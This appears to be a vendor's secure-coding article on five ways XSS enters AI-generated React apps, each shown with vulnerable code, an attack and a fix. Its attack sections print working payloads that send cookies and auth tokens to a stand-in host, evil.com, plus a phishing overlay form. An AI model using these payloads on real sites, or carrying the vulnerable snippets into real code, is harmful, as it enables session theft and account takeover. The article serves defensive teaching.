Cross-Site Scripting in React: Why dangerouslySetInnerHTML Actually Is Dangerous
React's JSX escaping protects you from most XSS — until your AI coding assistant reaches for dangerouslySetInnerHTML, user-controlled href attributes, or unescaped markdown rendering. Here's how XSS shows up in AI-generated React code and how to fix every pattern.
React is supposed to protect you from XSS
And it mostly does. React's JSX auto-escapes every value you embed in curly braces. Write <p>{userInput}</p> and React converts <script>alert('xss')</script> into harmless text. No execution. No injection. It just renders the literal characters on the page.
This is why React developers feel safe from cross-site scripting. They've heard it a hundred times: "React escapes by default." And that's true — for the default case.
But the default case isn't the only case. There are at least five patterns where React's built-in escaping doesn't help. And every one of them is a pattern that AI coding assistants generate regularly, because they solve real problems: rendering rich text, displaying markdown, building dynamic links, handling CMS content.
Your AI isn't generating these patterns to be reckless. It's generating them because you asked for something that requires raw HTML, and raw HTML is where XSS lives.
XSS in thirty seconds
Cross-site scripting (XSS) is when an attacker injects executable code — usually JavaScript — into your application, and your application runs it in another user's browser. The attacker's code runs with full access to that user's session: cookies, tokens, local storage, everything.
The impact ranges from annoying (pop-up alerts) to catastrophic (session hijacking, data theft, account takeover). XSS is OWASP A03:2021 — Injection, and it remains one of the most common web vulnerabilities year after year.
React's auto-escaping is the reason XSS is less common in modern React apps than in jQuery-era applications. But "less common" is not "impossible."
Why React is usually safe
React's JSX does something clever. When you write:
const userInput = '<img src=x onerror="alert(document.cookie)">';
return <div>{userInput}</div>;
React doesn't insert that string as HTML. It creates a text node. The browser renders the literal characters <img src=x onerror="alert(document.cookie)"> as visible text. No element is created. No event handler fires.
This is the default for every {} expression in JSX. It handles <script> tags, event handlers, SVG payloads, and every other HTML injection vector — as long as you stay within JSX's normal rendering path.
The five patterns below are all ways to leave that path.
Pattern 1: dangerouslySetInnerHTML
This is the most obvious bypass, and the one AI reaches for most often. React named it dangerouslySetInnerHTML as a warning. AI coding assistants treat it as a standard API.
When AI generates it
You ask: "Display rich text content from my CMS." Or: "Render the HTML body of a blog post." Or: "Show a user's formatted bio." The AI responds with:
// VULNERABLE — AI-generated CMS content renderer
function BlogPost({ post }) {
  return (
    <article>
      <h1>{post.title}</h1>
      <div dangerouslySetInnerHTML={{ __html: post.body }} />
    </article>
  );
}
This works. The rich text renders with all its formatting — bold, italics, links, images. The AI tested the happy path and moved on.
The attack
If post.body contains user-contributed content — comments, bios, forum posts, any field a user can edit — an attacker submits:
<img src=x onerror="fetch('https://evil.com/steal?cookie='+document.cookie)">
Or more subtly:
Nice post!<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:9999">
<h2>Session expired. Please log in again.</h2>
<form action="https://evil.com/phish"><input name="email" placeholder="Email">
<input name="password" type="password" placeholder="Password">
<button>Log in</button></form></div>
The first payload steals cookies. The second creates a pixel-perfect phishing form overlaid on your app. Both execute the moment any user views the page.
The fix
Sanitize the HTML before rendering it. DOMPurify is the standard library for this:
npm install dompurify
npm install -D @types/dompurify # only for older DOMPurify releases; recent versions bundle their own types
// FIXED — sanitize before rendering
import DOMPurify from "dompurify";

function BlogPost({ post }) {
  const cleanHTML = DOMPurify.sanitize(post.body);
  return (
    <article>
      <h1>{post.title}</h1>
      <div dangerouslySetInnerHTML={{ __html: cleanHTML }} />
    </article>
  );
}
DOMPurify strips script tags, event handlers, javascript: URLs, and every other XSS vector while preserving safe formatting tags like <b>, <em>, <a> (with safe href values), and <img> (without event handlers).
For server components in Next.js, use isomorphic-dompurify or sanitize on the server with sanitize-html:
// Server component alternative
import sanitizeHtml from "sanitize-html";

function BlogPost({ post }) {
  const cleanHTML = sanitizeHtml(post.body, {
    allowedTags: sanitizeHtml.defaults.allowedTags.concat(["img"]),
    allowedAttributes: {
      a: ["href", "target"],
      img: ["src", "alt"],
    },
  });
  return (
    <article>
      <h1>{post.title}</h1>
      <div dangerouslySetInnerHTML={{ __html: cleanHTML }} />
    </article>
  );
}
Pattern 2: User-controlled href attributes
JSX escapes content, not attribute semantics. When a user controls the href of a link, React will faithfully render whatever protocol they provide — including javascript:.
When AI generates it
You ask: "Let users add their website URL to their profile." The AI writes:
// VULNERABLE — user-controlled href
function UserProfile({ user }) {
  return (
    <div>
      <h2>{user.name}</h2>
      <a href={user.website}>Visit website</a>
    </div>
  );
}
The attack
A user sets their website to:
javascript:fetch('https://evil.com/steal?token='+localStorage.getItem('auth_token'))
Anyone who clicks "Visit website" executes that JavaScript in their own browser. No broken HTML, no script tags — just a link that looks normal in the UI.
Even data: URIs can be dangerous:
data:text/html,<script>alert(document.cookie)</script>
The fix
Validate URLs before rendering them as href values. Only allow http: and https: protocols:
// FIXED — validate URL protocol
function sanitizeUrl(url: string): string {
  try {
    const parsed = new URL(url);
    if (parsed.protocol === "http:" || parsed.protocol === "https:") {
      return url;
    }
    return "#";
  } catch {
    return "#";
  }
}

function UserProfile({ user }) {
  return (
    <div>
      <h2>{user.name}</h2>
      <a href={sanitizeUrl(user.website)}>Visit website</a>
    </div>
  );
}
The URL constructor handles edge cases like JAVASCRIPT: (case variations), URL encoding, and malformed inputs. If the URL isn't valid HTTP or HTTPS, replace it with #.
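A quick sanity check of that behavior outside React, with the helper repeated so the snippet runs on its own (the test inputs are illustrative):

```typescript
// Same validator as above, repeated so this snippet is self-contained.
function sanitizeUrl(url: string): string {
  try {
    const parsed = new URL(url);
    if (parsed.protocol === "http:" || parsed.protocol === "https:") {
      return url;
    }
    return "#";
  } catch {
    return "#";
  }
}

console.log(sanitizeUrl("https://example.com/profile")); // passes through unchanged
console.log(sanitizeUrl("JaVaScRiPt:alert(1)"));         // "#" — protocol is lowercased before the check
console.log(sanitizeUrl("data:text/html,<b>hi</b>"));    // "#"
console.log(sanitizeUrl("not a url at all"));            // "#" — constructor throws, caught
```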
Pattern 3: Unescaped markdown rendering
Markdown is everywhere in AI-generated apps — README viewers, note-taking apps, documentation pages, chat interfaces with formatted messages. AI reaches for markdown libraries and often skips sanitization.
When AI generates it
You ask: "Render user comments as markdown." The AI installs marked and writes:
// VULNERABLE — unsanitized markdown
import { marked } from "marked";

function Comment({ text }) {
  const html = marked(text);
  return <div dangerouslySetInnerHTML={{ __html: html }} />;
}
The attack
Markdown supports inline HTML. A user submits:
Great article! Really enjoyed the section on React.
<img src=x onerror="document.location='https://evil.com/steal?c='+document.cookie">
Looking forward to the next one.
The markdown parser converts this to HTML, preserving the <img> tag with the malicious event handler. dangerouslySetInnerHTML drops it straight into the DOM. The onerror fires because src=x fails to load.
Even without explicit HTML, some markdown renderers support dangerous constructs:
[Click here](javascript:alert(document.cookie))
The fix
There are two approaches. Either sanitize the HTML output of the markdown parser, or use a parser that produces React elements directly instead of HTML strings.
Option A: Sanitize the output
// FIXED — sanitize markdown output
import { marked } from "marked";
import DOMPurify from "dompurify";

function Comment({ text }) {
  const rawHTML = marked(text);
  const cleanHTML = DOMPurify.sanitize(rawHTML);
  return <div dangerouslySetInnerHTML={{ __html: cleanHTML }} />;
}
Option B: Use react-markdown (no dangerouslySetInnerHTML needed)
// BEST — render markdown as React elements
import ReactMarkdown from "react-markdown";

function Comment({ text }) {
  return <ReactMarkdown>{text}</ReactMarkdown>;
}
react-markdown parses markdown into an AST and renders React components — no intermediate HTML string, no dangerouslySetInnerHTML. By default, it doesn't render raw HTML blocks from the input. This is the safest approach because XSS is architecturally impossible without explicitly enabling the rehype-raw plugin.
If you do need to support HTML inside markdown (some CMS content requires it), use rehype-raw with rehype-sanitize:
import ReactMarkdown from "react-markdown";
import rehypeRaw from "rehype-raw";
import rehypeSanitize from "rehype-sanitize";

function CMSContent({ body }) {
  return (
    <ReactMarkdown rehypePlugins={[rehypeRaw, rehypeSanitize]}>
      {body}
    </ReactMarkdown>
  );
}
Pattern 4: Server-side rendering injection
This pattern is less common but more devastating. It appears when AI generates server-side code that interpolates user data into raw HTML strings — bypassing React's rendering pipeline entirely.
When AI generates it
You ask: "Create an API route that returns an HTML email preview." Or: "Generate an Open Graph meta tag with the user's name." The AI writes:
// VULNERABLE — SSR string interpolation
// app/api/preview/route.ts
export async function GET(request: Request) {
  const url = new URL(request.url);
  const title = url.searchParams.get("title") || "Untitled";
  return new Response(
    `<!DOCTYPE html>
<html>
  <head><title>${title}</title></head>
  <body>
    <h1>${title}</h1>
    <p>Preview of your page</p>
  </body>
</html>`,
    { headers: { "Content-Type": "text/html" } }
  );
}
The attack
This is classic reflected XSS. An attacker crafts a URL:
https://yourapp.com/api/preview?title=<script>document.location='https://evil.com/steal?c='+document.cookie</script>
They send this link to a victim. The victim clicks it. The server renders the script tag directly into the HTML response. The browser executes it. The attacker has the victim's cookies.
This bypasses React entirely because the HTML is built as a string, not through JSX. React's auto-escaping never gets a chance to help.
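You can see the core problem without running a server: template interpolation copies the parameter into the markup byte for byte. A minimal sketch:

```typescript
// Simulates the vulnerable route's interpolation with an attacker-supplied title.
const title = "<script>alert(1)</script>";
const html = `<h1>${title}</h1>`;
console.log(html);
// <h1><script>alert(1)</script></h1> — the script tag lands in the response verbatim
```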
The fix
Escape HTML entities in any user input that goes into server-rendered HTML strings:
// FIXED — escape HTML entities
function escapeHtml(str: string): string {
  return str
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

export async function GET(request: Request) {
  const url = new URL(request.url);
  const rawTitle = url.searchParams.get("title") || "Untitled";
  const title = escapeHtml(rawTitle);
  return new Response(
    `<!DOCTYPE html>
<html>
  <head><title>${title}</title></head>
  <body>
    <h1>${title}</h1>
    <p>Preview of your page</p>
  </body>
</html>`,
    { headers: { "Content-Type": "text/html" } }
  );
}
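Run against a payload like the one above, the escaper turns markup into inert text. The helper is repeated here so the snippet runs standalone:

```typescript
// Same escaper as the fix: ampersand first, so later entities aren't double-escaped.
function escapeHtml(str: string): string {
  return str
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

const payload = "<script>document.location='https://evil.com/steal'</script>";
console.log(escapeHtml(payload));
// &lt;script&gt;document.location=&#39;https://evil.com/steal&#39;&lt;/script&gt;
```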
Or better: avoid raw HTML strings entirely. Use React's renderToString for server-rendered content — it auto-escapes the same way JSX does in the browser.
Pattern 5: eval() and dynamic script injection
This is the most dangerous pattern, and the one that experienced developers find most surprising when AI generates it. The AI uses eval() for dynamic features or creates <script> elements from user input.
When AI generates it
You ask: "Build a calculator component" or "Let users create custom dashboard formulas." The AI reaches for eval:
// VULNERABLE — eval with user input
function Calculator() {
  const [expression, setExpression] = useState("");
  const [result, setResult] = useState<number | null>(null);

  const calculate = () => {
    try {
      setResult(eval(expression));
    } catch {
      setResult(null);
    }
  };

  return (
    <div>
      <input
        value={expression}
        onChange={(e) => setExpression(e.target.value)}
        placeholder="Enter expression: 2 + 2"
      />
      <button onClick={calculate}>Calculate</button>
      {result !== null && <p>Result: {result}</p>}
    </div>
  );
}
Or it creates script elements dynamically:
// VULNERABLE — dynamic script injection
function EmbedWidget({ config }) {
  useEffect(() => {
    const script = document.createElement("script");
    script.innerHTML = `
      window.widgetConfig = ${JSON.stringify(config)};
      initWidget(window.widgetConfig);
    `;
    document.body.appendChild(script);
  }, [config]);

  return <div id="widget-container" />;
}
The attack
With eval, any input becomes executable code:
fetch('https://evil.com/steal?token='+localStorage.getItem('auth_token'))
With the script injection pattern, the weak point is serialization. JSON.stringify escapes quotes and backslashes, but not the sequence </script>. If the same interpolation ever lands in server-rendered HTML, a user-controlled config string containing </script> closes the script element early, and everything after it is parsed as attacker-controlled markup. Even in the DOM version above, user data becomes part of executable script text, which leaves you one serialization quirk away from code execution.
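A minimal sketch of that serialization gap, in plain Node with no React involved:

```typescript
// JSON.stringify escapes quotes and backslashes, but leaves "</script>" intact.
const config = { greeting: "</script><script>alert(document.cookie)</script>" };
const inline = `window.widgetConfig = ${JSON.stringify(config)};`;
console.log(inline);
// When this string is emitted inside a server-rendered <script> block, the HTML
// parser ends the script element at the first "</script>" in the value and
// treats what follows as new, attacker-controlled markup.
```

Hardened serializers (serialize-javascript, for example) sidestep this by emitting unicode escapes like \u003C for every < in string values.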
The fix
For math expressions, use a safe parser like mathjs:
// FIXED — safe expression evaluation
import { evaluate } from "mathjs";

function Calculator() {
  const [expression, setExpression] = useState("");
  const [result, setResult] = useState<number | null>(null);

  const calculate = () => {
    try {
      const parsed = evaluate(expression);
      setResult(Number(parsed));
    } catch {
      setResult(null);
    }
  };

  return (
    <div>
      <input
        value={expression}
        onChange={(e) => setExpression(e.target.value)}
        placeholder="Enter expression: 2 + 2"
      />
      <button onClick={calculate}>Calculate</button>
      {result !== null && <p>Result: {result}</p>}
    </div>
  );
}
mathjs evaluates mathematical expressions without executing arbitrary JavaScript. No fetch, no DOM access, no code execution — just math.
For widget configuration, pass data through data- attributes or React state instead of injecting scripts:
// FIXED — pass config without script injection
function EmbedWidget({ config }) {
  const containerRef = useRef<HTMLDivElement>(null);

  useEffect(() => {
    if (containerRef.current) {
      // Call the widget API directly, don't inject scripts
      initWidget(containerRef.current, config);
    }
  }, [config]);

  return <div ref={containerRef} />;
}
Why AI generates these patterns
AI coding assistants generate all five patterns for the same reason: they solve the problem you described.
You asked for rich text rendering, and dangerouslySetInnerHTML renders rich text. You asked for a user profile link, and <a href={user.website}> creates a link. You asked for markdown, and marked renders markdown. Every generated solution is functionally correct.
The AI optimizes for "does this work?" It doesn't model what happens when a malicious user submits crafted input. It doesn't think about what an onerror handler on an <img> tag does. It sees a pattern — display HTML content, create links, render markdown — and produces the most common implementation from its training data.
That training data includes millions of tutorials, Stack Overflow answers, and blog posts. Many of them show these patterns without sanitization, because the tutorial author was focused on teaching the feature, not defending against attacks.
The result: code that works perfectly in development and is exploitable in production.
Prevention checklist
Here's how to protect your React app from XSS, whether the code was AI-generated or hand-written.
1. Audit every use of dangerouslySetInnerHTML
grep -rn "dangerouslySetInnerHTML" --include="*.tsx" --include="*.jsx" .
Every result needs a sanitization call before the HTML reaches the DOM. If there's no DOMPurify.sanitize() or equivalent, it's a potential XSS vector.
2. Audit every dynamic href, src, and action attribute
grep -rn 'href={' --include="*.tsx" --include="*.jsx" .
grep -rn 'src={' --include="*.tsx" --include="*.jsx" .
grep -rn 'action={' --include="*.tsx" --include="*.jsx" .
Any attribute that takes a URL and uses user-controlled data needs protocol validation. Only allow http: and https:.
3. Check your markdown pipeline
If you use marked, remark, markdown-it, or any markdown library, verify that the output is either sanitized with DOMPurify or rendered through react-markdown without rehype-raw.
4. Set Content Security Policy headers
CSP is your safety net. Even if an XSS payload makes it into the DOM, a strong CSP can prevent it from executing:
// next.config.js — basic CSP
const securityHeaders = [
  {
    key: "Content-Security-Policy",
    value: [
      "default-src 'self'",
      "script-src 'self'",
      "style-src 'self' 'unsafe-inline'",
      "img-src 'self' data: https:",
      "connect-src 'self' https://your-api.com",
    ].join("; "),
  },
];

module.exports = {
  async headers() {
    // Apply the CSP to every route
    return [{ source: "/:path*", headers: securityHeaders }];
  },
};
script-src 'self' blocks inline scripts and eval(). This single directive neutralizes most XSS payloads even if your code has vulnerabilities.
5. Never use eval()
grep -rn "eval(" --include="*.tsx" --include="*.jsx" --include="*.ts" --include="*.js" .
grep -rn "new Function(" --include="*.tsx" --include="*.jsx" --include="*.ts" --include="*.js" .
If you find either, replace it. eval() has no safe use case when processing user input.
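If you are tempted to keep eval for a "harmless" feature, remember that any expression can carry side effects into your app's scope before returning a value. A small sketch (the leaked property name is made up for illustration):

```typescript
// The "expression" runs arbitrary statements; the math result is just the last one.
const expression = "globalThis.leaked = 'anything reachable from here'; 2 + 2";
const result = eval(expression);
console.log(result); // 4
console.log((globalThis as any).leaked); // 'anything reachable from here'
```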
How Flowpatrol catches XSS
Flowpatrol tests for XSS the way an attacker would. It submits payloads into every input field, URL parameter, and form on your app — then checks whether those payloads execute in the rendered page. It catches dangerouslySetInnerHTML without sanitization, javascript: URLs in links, unescaped markdown output, and reflected XSS in server-rendered responses.
The same patterns covered in this article. Automated. Across every page of your app.
Paste your URL. Get a report. Fix what matters.
XSS is classified under OWASP A03:2021 — Injection. For more on injection attacks in AI-generated code, see SQL Injection Is Not Dead. For the full picture of what AI-generated apps get wrong, see Top 10 Vulnerabilities in Vibe-Coded Apps.